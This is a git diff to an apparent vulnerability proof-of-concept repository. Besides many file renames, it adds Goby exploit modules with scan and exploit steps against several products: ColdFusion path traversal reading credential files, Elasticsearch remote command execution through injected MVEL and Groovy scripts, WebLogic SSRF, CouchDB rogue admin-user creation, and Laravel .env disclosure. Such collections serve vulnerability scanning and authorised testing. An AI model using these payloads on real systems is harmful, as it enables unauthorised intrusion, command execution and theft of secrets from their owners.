diff --git a/.gitignore b/.gitignore
index e3ac20b31..d17d448ef 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1 @@
-script/
-CVE-2021-41773/
\ No newline at end of file
+script/
\ No newline at end of file
diff --git a/2010/CVE-2010-1871/poc/xray/CVE-2010-1871.yaml b/2010/CVE-2010-1871/poc/xray/CVE-2010-1871.yml
similarity index 100%
rename from 2010/CVE-2010-1871/poc/xray/CVE-2010-1871.yaml
rename to 2010/CVE-2010-1871/poc/xray/CVE-2010-1871.yml
diff --git a/2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json b/2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json
new file mode 100644
index 000000000..4ea668170
--- /dev/null
+++ b/2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json
@@ -0,0 +1,103 @@
+{
+ "Name": "Coldfusion LFI CVE-2010-2861",
+ "Level": "2",
+ "Tags": [
+ "lfi"
+ ],
+ "GobyQuery": "app=\"Adobe-ColdFusion\"",
+ "Description": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.",
+ "Product": "Adobe ColdFusion",
+ "Homepage": "https://www.adobe.com/products/coldfusion-family.html",
+ "Author": "aetkrad",
+ "Impact": "read arbitrary files
",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "Filepath",
+ "Type": "select",
+ "Value": "../../../../../../../../../../etc/passwd%00en,../../../../../../../lib/password.properties%00en"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "rdspassword=",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "encrypted=",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/CFIDE/administrator/enter.cfm?locale={{{cmd}}}",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-08 15:51:21",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2010/CVE-2010-2861/poc/xray/CVE-2010-2861.yaml b/2010/CVE-2010-2861/poc/xray/CVE-2010-2861.yml
similarity index 100%
rename from 2010/CVE-2010-2861/poc/xray/CVE-2010-2861.yaml
rename to 2010/CVE-2010-2861/poc/xray/CVE-2010-2861.yml
diff --git a/2012/CVE-2012-1823/poc/xray/CVE-2012-1823.yaml b/2012/CVE-2012-1823/poc/xray/CVE-2012-1823.yml
similarity index 100%
rename from 2012/CVE-2012-1823/poc/xray/CVE-2012-1823.yaml
rename to 2012/CVE-2012-1823/poc/xray/CVE-2012-1823.yml
diff --git a/2014/CVE-2014-3120/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go b/2014/CVE-2014-3120/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go
new file mode 100644
index 000000000..731443ae8
--- /dev/null
+++ b/2014/CVE-2014-3120/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go
@@ -0,0 +1,191 @@
+package exploits
+
+import (
+ "git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+ expJson := `{
+ "Name": "Elasticsearch Remote Code Execution CVE-2014-3120",
+ "Description": "The default configuration before Elasticsearch 1.2 enabled dynamic scripting, which allowed remote attackers to execute arbitrary MVEL expressions and Java code through the source parameter of _search.",
+ "Product": "Elasticsearch",
+ "Homepage": "https://gobies.org/",
+ "DisclosureDate": "2021-04-10",
+ "Author": "zhzyker",
+ "GobyQuery": "product=elasticsearch",
+ "Level": "3",
+ "Impact": "ElasticSearch is an open source, distributed, RESTful search engine built on Lucene. Designed for use in cloud computing, it can achieve real-time, stable, reliable and fast search, and is easy to install and use. Supports data indexing via HTTP request and using JSON.
Since ElasticSearch has enabled dynamic script execution by default, any user can execute arbitrary Java code by constructing a specially crafted submission.
",
+ "Recommandation": "The official version of elasticsearch 1.2 has been publicly released, and the dynamic script execution function is disabled by default.
",
+ "References": [
+ "https://github.com/zhzyker"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "cmd",
+ "type": "input",
+ "value": "whoami"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/website/blog/",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{ \"name\": \"cve-2014-3120\" }"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": "http_code"
+ }
+ ]
+ },
+ "SetVariable": []
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/_search?pretty",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"echo 0d455d3d2044e6e7781771d932e68dbc_goby_nb\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "0d455d3d2044e6e7781771d932e68dbc",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/website/blog/",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{ \"name\": \"cve-2014-3120\" }"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": "http_code"
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/_search?pretty",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"{{{cmd}}}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": "http_code"
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|(?s)\"command\" : (.*)}"
+ ]
+ }
+ ],
+ "Tags": [
+ "RCE"
+ ],
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": null,
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ }
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ nil,
+ nil,
+ ))
+}
diff --git a/2014/CVE-2014-3120/poc/xray/CVE-2014-3120.yaml b/2014/CVE-2014-3120/poc/xray/CVE-2014-3120.yml
similarity index 100%
rename from 2014/CVE-2014-3120/poc/xray/CVE-2014-3120.yaml
rename to 2014/CVE-2014-3120/poc/xray/CVE-2014-3120.yml
diff --git a/2014/CVE-2014-3704/poc/xray/CVE-2014-3704.yaml b/2014/CVE-2014-3704/poc/xray/CVE-2014-3704.yml
similarity index 100%
rename from 2014/CVE-2014-3704/poc/xray/CVE-2014-3704.yaml
rename to 2014/CVE-2014-3704/poc/xray/CVE-2014-3704.yml
diff --git "a/2014/CVE-2014-4210/poc/goby/Weblogic SSRF\346\274\217\346\264\236 CVE-2014-4210.json" "b/2014/CVE-2014-4210/poc/goby/Weblogic SSRF\346\274\217\346\264\236 CVE-2014-4210.json"
new file mode 100644
index 000000000..852ef4861
--- /dev/null
+++ "b/2014/CVE-2014-4210/poc/goby/Weblogic SSRF\346\274\217\346\264\236 CVE-2014-4210.json"
@@ -0,0 +1,101 @@
+{
+ "Name": "Weblogic SSRF漏洞 CVE-2014-4210",
+ "Level": "2",
+ "Tags": [
+ "SSRF"
+ ],
+ "GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
+ "Description": "Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件,此漏洞可通过HTTP协议利用,未经身份验证的远程攻击者可利用此漏洞影响受影响组件的机密性\n\nOracle WebLogic Server 10.0.2.0\nOracle WebLogic Server 10.3.6.0\n\nhttp://xxx.xxx.xxx.xxx:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://xxx.xxx.xxx.xxx:7001",
+ "Product": "Oracle WebLogic Server",
+ "Homepage": "https://www.oracle.com",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐑
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp":true,
+ "ExpParams":[
+ {
+ "name":"payload",
+ "type":"input",
+ "value":"127.0.0.1:7001",
+ "show":""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/uddiexplorer/SearchPublicRegistries.jsp",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Search",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "OR",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
+ "follow_redirect": false,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+
+ "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
+ "follow_redirect": false,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+
+ "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
+ "follow_redirect": false,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+
+ "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
+ }
+ ],
+ "PostTime": "2021-01-23 20:47:39",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
diff --git a/2014/CVE-2014-6271/poc/xray/CVE-2014-6271.yaml b/2014/CVE-2014-6271/poc/xray/CVE-2014-6271.yml
similarity index 100%
rename from 2014/CVE-2014-6271/poc/xray/CVE-2014-6271.yaml
rename to 2014/CVE-2014-6271/poc/xray/CVE-2014-6271.yml
diff --git a/2015/CVE-2015-1427/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go b/2015/CVE-2015-1427/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go
new file mode 100644
index 000000000..30b815711
--- /dev/null
+++ b/2015/CVE-2015-1427/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go
@@ -0,0 +1,198 @@
+package exploits
+
+import (
+ "git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+ expJson := `{
+ "Name": "Elasticsearch Remote Code Execution CVE-2015-1427",
+ "Description": "The Groovy script engine before Elasticsearch 1.3.8 and the Groovy script engine in 1.4.x before 1.4.3 allow remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands through elaborate scripts.",
+ "Product": "Elasticsearch",
+ "Homepage": "https://www.elastic.co/cn/elasticsearch/",
+ "DisclosureDate": "2021-04-11",
+ "Author": "zhzyker",
+ "GobyQuery": "product=elasticsearch",
+ "Level": "3",
+ "Impact": "In 2014, a remote code execution vulnerability (CVE-2014-3120) was exposed. The vulnerability appeared in the script query module. Since search engines support the use of script code (MVEL) as an expression for data manipulation, attackers can use MVEL Construct and execute arbitrary java code,
Later, the scripting language engine was changed to Groovy and a sandbox was added to control it. Dangerous codes would be intercepted. As a result, this time because the sandbox restrictions were not strict, it led to remote code execution.
",
+ "Recommandation": "Close the groovy sandbox to stop the use of dynamic scripts:
script.groovy.sandbox.enabled: false
",
+ "References": [
+ "https://github.com/zhzyker"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "cmd",
+ "type": "input",
+ "value": "whoami"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/website/blog/",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{ \"name\": \"cve-2015-1427\" }"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/_search?pretty",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/text"
+ },
+ "data_type": "text",
+ "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"echo 460f7ccb583e25e09c0fe100a2c9e90d\\\").getText()\"}}}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "460f7ccb583e25e09c0fe100a2c9e90d",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/website/blog/",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "{ \"name\": \"cve-2015-1427\" }"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/_search?pretty",
+ "follow_redirect": true,
+ "header": {
+ "Accept-Encoding": "gzip, deflate",
+ "Accept": "*/*",
+ "Connection": "close",
+ "Accept-Language": "en",
+ "Content-Type": "application/text"
+ },
+ "data_type": "text",
+ "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"{{{cmd}}}\\\").getText()\"}}}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "460f7ccb583e25e09c0fe100a2c9e90d",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|(?s)\"lupin\" : \\[ \"(.*)\" \\]"
+ ]
+ }
+ ],
+ "Tags": [
+ "RCE"
+ ],
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": null,
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ }
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ nil,
+ nil,
+ ))
+}
\ No newline at end of file
diff --git a/2015/CVE-2015-1427/poc/xray/CVE-2015-1427.yaml b/2015/CVE-2015-1427/poc/xray/CVE-2015-1427.yml
similarity index 100%
rename from 2015/CVE-2015-1427/poc/xray/CVE-2015-1427.yaml
rename to 2015/CVE-2015-1427/poc/xray/CVE-2015-1427.yml
diff --git a/2015/CVE-2015-3337/poc/xray/CVE-2015-3337.yaml b/2015/CVE-2015-3337/poc/xray/CVE-2015-3337.yml
similarity index 100%
rename from 2015/CVE-2015-3337/poc/xray/CVE-2015-3337.yaml
rename to 2015/CVE-2015-3337/poc/xray/CVE-2015-3337.yml
diff --git a/2015/CVE-2015-5531/poc/xray/CVE-2015-5531.yaml b/2015/CVE-2015-5531/poc/xray/CVE-2015-5531.yml
similarity index 100%
rename from 2015/CVE-2015-5531/poc/xray/CVE-2015-5531.yaml
rename to 2015/CVE-2015-5531/poc/xray/CVE-2015-5531.yml
diff --git a/2015/CVE-2015-7297/poc/xray/CVE-2015-7297.yaml b/2015/CVE-2015-7297/poc/xray/CVE-2015-7297.yml
similarity index 100%
rename from 2015/CVE-2015-7297/poc/xray/CVE-2015-7297.yaml
rename to 2015/CVE-2015-7297/poc/xray/CVE-2015-7297.yml
diff --git a/2015/CVE-2015-8399/poc/xray/CVE-2015-8399.yaml b/2015/CVE-2015-8399/poc/xray/CVE-2015-8399.yml
similarity index 100%
rename from 2015/CVE-2015-8399/poc/xray/CVE-2015-8399.yaml
rename to 2015/CVE-2015-8399/poc/xray/CVE-2015-8399.yml
diff --git a/2016/CVE-2016-10134/poc/xray/CVE-2016-10134.yaml b/2016/CVE-2016-10134/poc/xray/CVE-2016-10134.yml
similarity index 100%
rename from 2016/CVE-2016-10134/poc/xray/CVE-2016-10134.yaml
rename to 2016/CVE-2016-10134/poc/xray/CVE-2016-10134.yml
diff --git a/2016/CVE-2016-3088/poc/xray/CVE-2016-3088.yaml b/2016/CVE-2016-3088/poc/xray/CVE-2016-3088.yml
similarity index 100%
rename from 2016/CVE-2016-3088/poc/xray/CVE-2016-3088.yaml
rename to 2016/CVE-2016-3088/poc/xray/CVE-2016-3088.yml
diff --git a/2016/CVE-2016-4977/poc/xray/CVE-2016-4977.yaml b/2016/CVE-2016-4977/poc/xray/CVE-2016-4977.yml
similarity index 100%
rename from 2016/CVE-2016-4977/poc/xray/CVE-2016-4977.yaml
rename to 2016/CVE-2016-4977/poc/xray/CVE-2016-4977.yml
diff --git a/2017/CVE-2017-1000028/poc/xray/CVE-2017-1000028.yaml b/2017/CVE-2017-1000028/poc/xray/CVE-2017-1000028.yml
similarity index 100%
rename from 2017/CVE-2017-1000028/poc/xray/CVE-2017-1000028.yaml
rename to 2017/CVE-2017-1000028/poc/xray/CVE-2017-1000028.yml
diff --git a/2017/CVE-2017-10271/poc/xray/CVE-2017-10271.yaml b/2017/CVE-2017-10271/poc/xray/CVE-2017-10271.yml
similarity index 100%
rename from 2017/CVE-2017-10271/poc/xray/CVE-2017-10271.yaml
rename to 2017/CVE-2017-10271/poc/xray/CVE-2017-10271.yml
diff --git a/2017/CVE-2017-11610/poc/xray/CVE-2017-11610.yaml b/2017/CVE-2017-11610/poc/xray/CVE-2017-11610.yml
similarity index 100%
rename from 2017/CVE-2017-11610/poc/xray/CVE-2017-11610.yaml
rename to 2017/CVE-2017-11610/poc/xray/CVE-2017-11610.yml
diff --git a/2017/CVE-2017-12615/poc/xray/CVE-2017-12615.yaml b/2017/CVE-2017-12615/poc/xray/CVE-2017-12615.yml
similarity index 100%
rename from 2017/CVE-2017-12615/poc/xray/CVE-2017-12615.yaml
rename to 2017/CVE-2017-12615/poc/xray/CVE-2017-12615.yml
diff --git a/2017/CVE-2017-12629/poc/xray/CVE-2017-12629.yaml b/2017/CVE-2017-12629/poc/xray/CVE-2017-12629.yml
similarity index 100%
rename from 2017/CVE-2017-12629/poc/xray/CVE-2017-12629.yaml
rename to 2017/CVE-2017-12629/poc/xray/CVE-2017-12629.yml
diff --git a/2017/CVE-2017-12635/poc/goby/CVE-2017-12635.json b/2017/CVE-2017-12635/poc/goby/CVE-2017-12635.json
new file mode 100644
index 000000000..2f8adc091
--- /dev/null
+++ b/2017/CVE-2017-12635/poc/goby/CVE-2017-12635.json
@@ -0,0 +1,110 @@
+{
+ "Name": "Couchdb Add User Not Authorized CVE-2017-12635",
+ "Level": "3",
+ "Tags": [
+ "Ultra vires"
+ ],
+ "GobyQuery": "app=\"APACHE-CouchDB\"",
+ "Description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.",
+ "Product": "APACHE-CouchDB",
+ "Homepage": "http://couchdb.apache.org",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "创建用户",
+ "Type": "select",
+ "Value": "CanIHelpYou:NoThank"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "PUT",
+ "uri": "/_users/org.couchdb.user:{{{str1}}}",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/json"
+ },
+ "data_type": "text",
+ "data": " {\n \"type\": \"user\",\n \"name\": \"{{{str1}}}\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"{{{str2}}}\"\n }",
+ "set_variable": [
+ "str1|rand|str|32",
+ "str2|rand|str|64"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "org.couchdb.user:{{{r1}}}",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "PUT",
+ "uri": "/_users/org.couchdb.user:CanIHelpYou",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/json"
+ },
+ "data_type": "text",
+ "data": " {\n \"type\": \"user\",\n \"name\": \"CanIHelpYou\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"NoThank\"\n }",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "201",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "org.couchdb.user:CanIHelpYou",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-10 19:52:21",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2017/CVE-2017-12635/poc/xray/CVE-2017-12635.yaml b/2017/CVE-2017-12635/poc/xray/CVE-2017-12635.yml
similarity index 100%
rename from 2017/CVE-2017-12635/poc/xray/CVE-2017-12635.yaml
rename to 2017/CVE-2017-12635/poc/xray/CVE-2017-12635.yml
diff --git a/2017/CVE-2017-16877/poc/xray/CVE-2017-16877.yaml b/2017/CVE-2017-16877/poc/xray/CVE-2017-16877.yml
similarity index 100%
rename from 2017/CVE-2017-16877/poc/xray/CVE-2017-16877.yaml
rename to 2017/CVE-2017-16877/poc/xray/CVE-2017-16877.yml
diff --git "a/2017/CVE-2017-16894/poc/goby/Laravel .env \351\205\215\347\275\256\346\226\207\344\273\266\346\263\204\351\234\262 CVE-2017-16894.json" "b/2017/CVE-2017-16894/poc/goby/Laravel .env \351\205\215\347\275\256\346\226\207\344\273\266\346\263\204\351\234\262 CVE-2017-16894.json"
new file mode 100644
index 000000000..8cf5d4445
--- /dev/null
+++ "b/2017/CVE-2017-16894/poc/goby/Laravel .env \351\205\215\347\275\256\346\226\207\344\273\266\346\263\204\351\234\262 CVE-2017-16894.json"
@@ -0,0 +1,78 @@
+{
+ "Name": "Laravel .env 配置文件泄露 CVE-2017-16894",
+ "Level": "1",
+ "Tags": [
+ "信息泄露"
+ ],
+ "GobyQuery": "app=\"Laravel-Framework\"",
+ "Description": "Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息",
+ "Product": "Laravel framework <= 5.5.21",
+ "Homepage": "https://github.com/laravel/framework/tree/5.5",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐏
",
+ "Recommandation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": ".env",
+ "type": "select",
+ "value": ".env",
+ "show": ""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/.env",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "APP_NAME",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/.env",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-01-24 12:19:09",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
